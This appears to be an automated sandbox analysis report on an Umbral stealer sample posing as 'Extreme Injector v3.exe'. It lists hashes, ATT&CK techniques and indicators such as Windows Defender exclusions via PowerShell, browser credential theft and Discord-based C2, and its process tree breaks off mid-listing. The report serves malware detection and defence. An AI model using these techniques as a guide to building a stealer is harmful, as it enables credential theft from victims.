umbral | 261d6fc361222284586e133e152797651ecde629ac3243cf47dba5af1fa4c3cc

Analysis

max time kernel
149s
max time network
154s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
19-01-2025 14:14

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Extreme Injector v3.exe
Size

1.4MB
MD5

2290a5c6cfd6f8bd2e3ad188e7eafa05
SHA1

1b863031e8556e48fa63d233b768148d87dda7c4
SHA256

261d6fc361222284586e133e152797651ecde629ac3243cf47dba5af1fa4c3cc
SHA512

13310057c8f3e54a5c5c06b5976e6b97d2930191ee6c432e59faaf561968e6e6fa261021ffd2a08b040340f05ae878d7e46fdea4127032fb51fb0b0b2bdd82d7
SSDEEP

24576:PAOmi5Vm+lBnehvY2iPr93CeF1LH1Xt5QezP9tHtR9JSWmsMrlA18VnZAWQvKsoe:E4FdetMVCK1LVXXQezP3+Wgm18VeWouS

Score

10^/10

umbral discovery execution spyware stealer

Malware Config

Signatures

Detect Umbral payload 2 IoCs

resource	yara_rule
behavioral2/files/0x000c000000023b8d-7.dat	family_umbral
behavioral2/memory/964-17-0x000001CFCDBB0000-0x000001CFCDBF0000-memory.dmp	family_umbral

Umbral
Umbral stealer is an opensource moduler stealer written in C#.
stealer umbral
Umbral family
umbral

Command and Scripting Interpreter: PowerShell 1 TTPs 64 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
4124	powershell.exe
2000	powershell.exe
404	powershell.exe
2908	powershell.exe
4400	powershell.exe
2808	powershell.exe
1736	powershell.exe
5112	powershell.exe
4116	powershell.exe
2404	powershell.exe
3656	powershell.exe
3128	powershell.exe
5104	powershell.exe
5036	powershell.exe
2596	powershell.exe
3520	powershell.exe
3552	powershell.exe
1908	powershell.exe
3456	powershell.exe
4304	powershell.exe
1212	powershell.exe
4516	powershell.exe
3100	powershell.exe
4164	powershell.exe
3664	powershell.exe
2280	powershell.exe
4568	powershell.exe
696	powershell.exe
4900	powershell.exe
4184	powershell.exe
3172	powershell.exe
3172	powershell.exe
5104	powershell.exe
1328	powershell.exe
696	powershell.exe
4744	powershell.exe
1884	powershell.exe
2268	powershell.exe
1848	powershell.exe
432	powershell.exe
4760	powershell.exe
5040	powershell.exe
1736	powershell.exe
900	powershell.exe
3116	powershell.exe
3820	powershell.exe
1968	powershell.exe
4112	powershell.exe
4404	powershell.exe
3060	powershell.exe
5040	powershell.exe
468	powershell.exe
4916	powershell.exe
760	powershell.exe
232	powershell.exe
2324	powershell.exe
1232	powershell.exe
3236	powershell.exe
2928	powershell.exe
2988	powershell.exe
3100	powershell.exe
696	powershell.exe
4228	powershell.exe
4200	powershell.exe

Drops file in Drivers directory 21 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Extreme Injector.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Extreme Injector.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Extreme Injector.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Extreme Injector.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Extreme Injector.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Extreme Injector.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Extreme Injector.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Extreme Injector.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Extreme Injector.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Extreme Injector.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Extreme Injector.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Extreme Injector.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Extreme Injector.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Extreme Injector.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Extreme Injector.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Extreme Injector.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Extreme Injector.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Extreme Injector.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Extreme Injector.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Extreme Injector.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Extreme Injector.exe

Checks computer location settings 2 TTPs 64 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	Extreme Injector v3.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	Extreme Injector v3.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	Extreme Injector v3.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	Extreme Injector v3.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	Extreme Injector v3.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	Extreme Injector v3.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	Extreme Injector v3.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	Extreme Injector v3.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	Extreme Injector v3.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	Extreme Injector v3.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	Extreme Injector v3.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	Extreme Injector v3.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	Extreme Injector v3.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	Extreme Injector v3.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	Extreme Injector v3.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	Extreme Injector v3.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	Extreme Injector v3.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	Extreme Injector v3.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	Extreme Injector v3.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	Extreme Injector v3.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	Extreme Injector v3.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	Extreme Injector v3.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	Extreme Injector v3.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	Extreme Injector v3.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	Extreme Injector v3.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	Extreme Injector v3.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	Extreme Injector v3.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	Extreme Injector v3.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	Extreme Injector v3.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	Extreme Injector v3.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	Extreme Injector v3.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	Extreme Injector v3.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	Extreme Injector v3.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	Extreme Injector v3.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	Extreme Injector v3.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	Extreme Injector v3.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	Extreme Injector v3.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	Extreme Injector v3.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	Extreme Injector v3.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	Extreme Injector v3.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	Extreme Injector v3.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	Extreme Injector v3.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	Extreme Injector v3.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	Extreme Injector v3.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	Extreme Injector v3.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	Extreme Injector v3.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	Extreme Injector v3.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	Extreme Injector v3.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	Extreme Injector v3.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	Extreme Injector v3.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	Extreme Injector v3.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	Extreme Injector v3.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	Extreme Injector v3.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	Extreme Injector v3.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	Extreme Injector v3.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	Extreme Injector v3.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	Extreme Injector v3.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	Extreme Injector v3.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	Extreme Injector v3.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	Extreme Injector v3.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	Extreme Injector v3.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	Extreme Injector v3.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	Extreme Injector v3.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	Extreme Injector v3.exe

Executes dropped EXE 64 IoCs

pid	Process
964	Extreme Injector.exe
2428	Extreme Injector.exe
1552	Extreme Injector.exe
1924	Extreme Injector.exe
2692	Extreme Injector.exe
3788	Extreme Injector.exe
4896	Extreme Injector.exe
2300	Extreme Injector.exe
2832	Extreme Injector.exe
3616	Extreme Injector.exe
4544	Extreme Injector.exe
1072	Extreme Injector.exe
1384	Extreme Injector.exe
4384	Extreme Injector.exe
3780	Extreme Injector.exe
4640	Extreme Injector.exe
2840	Extreme Injector.exe
392	Extreme Injector.exe
3152	Extreme Injector.exe
1724	Extreme Injector.exe
868	Extreme Injector.exe
4048	Extreme Injector.exe
3612	Extreme Injector.exe
4320	Extreme Injector.exe
3664	Extreme Injector.exe
3776	Extreme Injector.exe
3100	Extreme Injector.exe
3676	Extreme Injector.exe
3220	Extreme Injector.exe
3016	Extreme Injector.exe
1896	Extreme Injector.exe
4616	Extreme Injector.exe
2912	Extreme Injector.exe
4044	Extreme Injector.exe
1808	Extreme Injector.exe
1488	Extreme Injector.exe
4176	Extreme Injector.exe
2276	Extreme Injector.exe
1384	Extreme Injector.exe
468	Extreme Injector.exe
2820	Extreme Injector.exe
1100	Extreme Injector.exe
3260	Extreme Injector.exe
2476	Extreme Injector.exe
3284	Extreme Injector.exe
4076	Extreme Injector.exe
2968	Extreme Injector.exe
2816	Extreme Injector.exe
5088	Extreme Injector.exe
5104	Extreme Injector.exe
2724	Extreme Injector.exe
428	Extreme Injector.exe
452	Extreme Injector.exe
1820	Extreme Injector.exe
1040	Extreme Injector.exe
748	Extreme Injector.exe
3172	Extreme Injector.exe
4888	Extreme Injector.exe
3232	Extreme Injector.exe
4680	Extreme Injector.exe
2688	Extreme Injector.exe
224	Extreme Injector.exe
4476	Extreme Injector.exe
1600	Extreme Injector.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Legitimate hosting services abused for malware hosting/C2 1 TTPs 40 IoCs

Web Service

T1102

flow	ioc
170	discord.com
28	discord.com
96	discord.com
128	discord.com
158	discord.com
159	discord.com
21	discord.com
84	discord.com
89	discord.com
112	discord.com
134	discord.com
20	discord.com
37	discord.com
78	discord.com
95	discord.com
141	discord.com
146	discord.com
171	discord.com
90	discord.com
152	discord.com
153	discord.com
104	discord.com
118	discord.com
135	discord.com
38	discord.com
49	discord.com
70	discord.com
71	discord.com
83	discord.com
164	discord.com
165	discord.com
27	discord.com
48	discord.com
77	discord.com
147	discord.com
105	discord.com
111	discord.com
117	discord.com
127	discord.com
140	discord.com

Looks up external IP address via web service 20 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
156	ip-api.com
17	ip-api.com
66	ip-api.com
75	ip-api.com
81	ip-api.com
138	ip-api.com
144	ip-api.com
25	ip-api.com
45	ip-api.com
115	ip-api.com
168	ip-api.com
132	ip-api.com
150	ip-api.com
35	ip-api.com
87	ip-api.com
93	ip-api.com
102	ip-api.com
109	ip-api.com
121	ip-api.com
162	ip-api.com

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 40 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
112	PING.EXE
5000	cmd.exe
1892	PING.EXE
3780	cmd.exe
3376	cmd.exe
1680	PING.EXE
448	cmd.exe
1740	cmd.exe
1136	cmd.exe
3588	cmd.exe
112	PING.EXE
1656	PING.EXE
1756	cmd.exe
4340	PING.EXE
2192	cmd.exe
3164	PING.EXE
4380	cmd.exe
264	cmd.exe
2720	PING.EXE
2404	PING.EXE
4804	PING.EXE
4196	cmd.exe
4392	PING.EXE
4160	cmd.exe
1980	cmd.exe
2648	PING.EXE
4812	PING.EXE
3660	cmd.exe
4516	PING.EXE
2000	cmd.exe
1028	PING.EXE
4704	PING.EXE
3544	PING.EXE
2496	cmd.exe
4048	PING.EXE
1624	cmd.exe
468	PING.EXE
3292	PING.EXE
3408	cmd.exe
4456	cmd.exe

Detects videocard installed 1 TTPs 20 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
4100	wmic.exe
1196	wmic.exe
3456	wmic.exe
396	wmic.exe
3740	wmic.exe
5084	wmic.exe
3744	wmic.exe
3164	wmic.exe
1852	wmic.exe
4228	wmic.exe
220	wmic.exe
468	wmic.exe
4508	wmic.exe
3232	wmic.exe
4928	wmic.exe
2884	wmic.exe
392	wmic.exe
2816	wmic.exe
3988	wmic.exe
3744	wmic.exe

Runs ping.exe 1 TTPs 20 IoCs

Remote System Discovery

T1018

pid	Process
2404	PING.EXE
1680	PING.EXE
3164	PING.EXE
3292	PING.EXE
112	PING.EXE
112	PING.EXE
2720	PING.EXE
4048	PING.EXE
4812	PING.EXE
1028	PING.EXE
468	PING.EXE
4392	PING.EXE
4704	PING.EXE
1656	PING.EXE
4340	PING.EXE
2648	PING.EXE
4804	PING.EXE
1892	PING.EXE
4516	PING.EXE
3544	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
5112	powershell.exe
5112	powershell.exe
4568	powershell.exe
4568	powershell.exe
696	powershell.exe
696	powershell.exe
4228	powershell.exe
4228	powershell.exe
2988	powershell.exe
2988	powershell.exe
3520	powershell.exe
3520	powershell.exe
4900	powershell.exe
4900	powershell.exe
468	powershell.exe
468	powershell.exe
3984	powershell.exe
3984	powershell.exe
1848	powershell.exe
1848	powershell.exe
4124	powershell.exe
4124	powershell.exe
4088	powershell.exe
4088	powershell.exe
2856	powershell.exe
2856	powershell.exe
4032	powershell.exe
4032	powershell.exe
4404	powershell.exe
4404	powershell.exe
4116	powershell.exe
4116	powershell.exe
4516	powershell.exe
4516	powershell.exe
4892	powershell.exe
4892	powershell.exe
4892	powershell.exe
2964	powershell.exe
2964	powershell.exe
2964	powershell.exe
3568	powershell.exe
3568	powershell.exe
2000	powershell.exe
2000	powershell.exe
2000	powershell.exe
468	powershell.exe
468	powershell.exe
468	powershell.exe
4184	powershell.exe
4184	powershell.exe
4824	powershell.exe
4824	powershell.exe
3100	powershell.exe
3100	powershell.exe
3552	powershell.exe
3552	powershell.exe
3552	powershell.exe
432	powershell.exe
432	powershell.exe
432	powershell.exe
696	powershell.exe
696	powershell.exe
696	powershell.exe
1916	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	964	Extreme Injector.exe
Token: SeDebugPrivilege	5112	powershell.exe
Token: SeDebugPrivilege	4568	powershell.exe
Token: SeDebugPrivilege	696	powershell.exe
Token: SeDebugPrivilege	4228	powershell.exe
Token: SeIncreaseQuotaPrivilege	5072	wmic.exe
Token: SeSecurityPrivilege	5072	wmic.exe
Token: SeTakeOwnershipPrivilege	5072	wmic.exe
Token: SeLoadDriverPrivilege	5072	wmic.exe
Token: SeSystemProfilePrivilege	5072	wmic.exe
Token: SeSystemtimePrivilege	5072	wmic.exe
Token: SeProfSingleProcessPrivilege	5072	wmic.exe
Token: SeIncBasePriorityPrivilege	5072	wmic.exe
Token: SeCreatePagefilePrivilege	5072	wmic.exe
Token: SeBackupPrivilege	5072	wmic.exe
Token: SeRestorePrivilege	5072	wmic.exe
Token: SeShutdownPrivilege	5072	wmic.exe
Token: SeDebugPrivilege	5072	wmic.exe
Token: SeSystemEnvironmentPrivilege	5072	wmic.exe
Token: SeRemoteShutdownPrivilege	5072	wmic.exe
Token: SeUndockPrivilege	5072	wmic.exe
Token: SeManageVolumePrivilege	5072	wmic.exe
Token: 33	5072	wmic.exe
Token: 34	5072	wmic.exe
Token: 35	5072	wmic.exe
Token: 36	5072	wmic.exe
Token: SeIncreaseQuotaPrivilege	5072	wmic.exe
Token: SeSecurityPrivilege	5072	wmic.exe
Token: SeTakeOwnershipPrivilege	5072	wmic.exe
Token: SeLoadDriverPrivilege	5072	wmic.exe
Token: SeSystemProfilePrivilege	5072	wmic.exe
Token: SeSystemtimePrivilege	5072	wmic.exe
Token: SeProfSingleProcessPrivilege	5072	wmic.exe
Token: SeIncBasePriorityPrivilege	5072	wmic.exe
Token: SeCreatePagefilePrivilege	5072	wmic.exe
Token: SeBackupPrivilege	5072	wmic.exe
Token: SeRestorePrivilege	5072	wmic.exe
Token: SeShutdownPrivilege	5072	wmic.exe
Token: SeDebugPrivilege	5072	wmic.exe
Token: SeSystemEnvironmentPrivilege	5072	wmic.exe
Token: SeRemoteShutdownPrivilege	5072	wmic.exe
Token: SeUndockPrivilege	5072	wmic.exe
Token: SeManageVolumePrivilege	5072	wmic.exe
Token: 33	5072	wmic.exe
Token: 34	5072	wmic.exe
Token: 35	5072	wmic.exe
Token: 36	5072	wmic.exe
Token: SeIncreaseQuotaPrivilege	3656	wmic.exe
Token: SeSecurityPrivilege	3656	wmic.exe
Token: SeTakeOwnershipPrivilege	3656	wmic.exe
Token: SeLoadDriverPrivilege	3656	wmic.exe
Token: SeSystemProfilePrivilege	3656	wmic.exe
Token: SeSystemtimePrivilege	3656	wmic.exe
Token: SeProfSingleProcessPrivilege	3656	wmic.exe
Token: SeIncBasePriorityPrivilege	3656	wmic.exe
Token: SeCreatePagefilePrivilege	3656	wmic.exe
Token: SeBackupPrivilege	3656	wmic.exe
Token: SeRestorePrivilege	3656	wmic.exe
Token: SeShutdownPrivilege	3656	wmic.exe
Token: SeDebugPrivilege	3656	wmic.exe
Token: SeSystemEnvironmentPrivilege	3656	wmic.exe
Token: SeRemoteShutdownPrivilege	3656	wmic.exe
Token: SeUndockPrivilege	3656	wmic.exe
Token: SeManageVolumePrivilege	3656	wmic.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2464 wrote to memory of 4092	2464	Extreme Injector v3.exe	83
PID 2464 wrote to memory of 4092	2464	Extreme Injector v3.exe	83
PID 2464 wrote to memory of 964	2464	Extreme Injector v3.exe	84
PID 2464 wrote to memory of 964	2464	Extreme Injector v3.exe	84
PID 964 wrote to memory of 2060	964	Extreme Injector.exe	85
PID 964 wrote to memory of 2060	964	Extreme Injector.exe	85
PID 964 wrote to memory of 5112	964	Extreme Injector.exe	87
PID 964 wrote to memory of 5112	964	Extreme Injector.exe	87
PID 4092 wrote to memory of 4032	4092	Extreme Injector v3.exe	89
PID 4092 wrote to memory of 4032	4092	Extreme Injector v3.exe	89
PID 964 wrote to memory of 4568	964	Extreme Injector.exe	90
PID 964 wrote to memory of 4568	964	Extreme Injector.exe	90
PID 4092 wrote to memory of 2428	4092	Extreme Injector v3.exe	92
PID 4092 wrote to memory of 2428	4092	Extreme Injector v3.exe	92
PID 964 wrote to memory of 696	964	Extreme Injector.exe	93
PID 964 wrote to memory of 696	964	Extreme Injector.exe	93
PID 964 wrote to memory of 4228	964	Extreme Injector.exe	95
PID 964 wrote to memory of 4228	964	Extreme Injector.exe	95
PID 4032 wrote to memory of 4484	4032	Extreme Injector v3.exe	97
PID 4032 wrote to memory of 4484	4032	Extreme Injector v3.exe	97
PID 964 wrote to memory of 5072	964	Extreme Injector.exe	98
PID 964 wrote to memory of 5072	964	Extreme Injector.exe	98
PID 4032 wrote to memory of 1552	4032	Extreme Injector v3.exe	100
PID 4032 wrote to memory of 1552	4032	Extreme Injector v3.exe	100
PID 964 wrote to memory of 3656	964	Extreme Injector.exe	103
PID 964 wrote to memory of 3656	964	Extreme Injector.exe	103
PID 964 wrote to memory of 392	964	Extreme Injector.exe	105
PID 964 wrote to memory of 392	964	Extreme Injector.exe	105
PID 964 wrote to memory of 2988	964	Extreme Injector.exe	107
PID 964 wrote to memory of 2988	964	Extreme Injector.exe	107
PID 964 wrote to memory of 2884	964	Extreme Injector.exe	109
PID 964 wrote to memory of 2884	964	Extreme Injector.exe	109
PID 4484 wrote to memory of 4280	4484	Extreme Injector v3.exe	111
PID 4484 wrote to memory of 4280	4484	Extreme Injector v3.exe	111
PID 4484 wrote to memory of 1924	4484	Extreme Injector v3.exe	112
PID 4484 wrote to memory of 1924	4484	Extreme Injector v3.exe	112
PID 964 wrote to memory of 5000	964	Extreme Injector.exe	113
PID 964 wrote to memory of 5000	964	Extreme Injector.exe	113
PID 5000 wrote to memory of 4804	5000	cmd.exe	115
PID 5000 wrote to memory of 4804	5000	cmd.exe	115
PID 4280 wrote to memory of 3112	4280	Extreme Injector v3.exe	117
PID 4280 wrote to memory of 3112	4280	Extreme Injector v3.exe	117
PID 4280 wrote to memory of 2692	4280	Extreme Injector v3.exe	118
PID 4280 wrote to memory of 2692	4280	Extreme Injector v3.exe	118
PID 2692 wrote to memory of 2816	2692	Extreme Injector.exe	120
PID 2692 wrote to memory of 2816	2692	Extreme Injector.exe	120
PID 2692 wrote to memory of 3520	2692	Extreme Injector.exe	122
PID 2692 wrote to memory of 3520	2692	Extreme Injector.exe	122
PID 2692 wrote to memory of 4900	2692	Extreme Injector.exe	124
PID 2692 wrote to memory of 4900	2692	Extreme Injector.exe	124
PID 2692 wrote to memory of 468	2692	Extreme Injector.exe	126
PID 2692 wrote to memory of 468	2692	Extreme Injector.exe	126
PID 2692 wrote to memory of 3984	2692	Extreme Injector.exe	128
PID 2692 wrote to memory of 3984	2692	Extreme Injector.exe	128
PID 3112 wrote to memory of 1120	3112	Extreme Injector v3.exe	130
PID 3112 wrote to memory of 1120	3112	Extreme Injector v3.exe	130
PID 3112 wrote to memory of 3788	3112	Extreme Injector v3.exe	131
PID 3112 wrote to memory of 3788	3112	Extreme Injector v3.exe	131
PID 2692 wrote to memory of 1720	2692	Extreme Injector.exe	132
PID 2692 wrote to memory of 1720	2692	Extreme Injector.exe	132
PID 2692 wrote to memory of 1560	2692	Extreme Injector.exe	134
PID 2692 wrote to memory of 1560	2692	Extreme Injector.exe	134
PID 2692 wrote to memory of 936	2692	Extreme Injector.exe	136
PID 2692 wrote to memory of 936	2692	Extreme Injector.exe	136

Views/modifies file attributes 1 TTPs 21 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
4092	attrib.exe
2200	attrib.exe
4320	attrib.exe
2356	attrib.exe
4856	attrib.exe
1716	attrib.exe
2268	attrib.exe
3016	attrib.exe
3924	attrib.exe
3152	attrib.exe
5068	attrib.exe
2816	attrib.exe
2928	attrib.exe
4868	attrib.exe
2200	attrib.exe
392	attrib.exe
2208	attrib.exe
2060	attrib.exe
1172	attrib.exe
1640	attrib.exe
3328	attrib.exe

C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe
"C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2464
- C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe
  "C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe"
  2⤵
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
  PID:4092
- - C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe
    "C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe"
    3⤵
    - Checks computer location settings
    - Suspicious use of WriteProcessMemory
    PID:4032
  - - C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe
      "C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe"
      4⤵
      Checks computer location settings
      Suspicious use of WriteProcessMemory
      PID:4484
    - - C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe"
        5⤵
        Checks computer location settings
        Suspicious use of WriteProcessMemory
        
        PID:4280
      - C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe"
        6⤵
        Checks computer location settings
        Suspicious use of WriteProcessMemory
        
        PID:3112
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe"
        7⤵
        Checks computer location settings
        
        PID:1120
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe
        
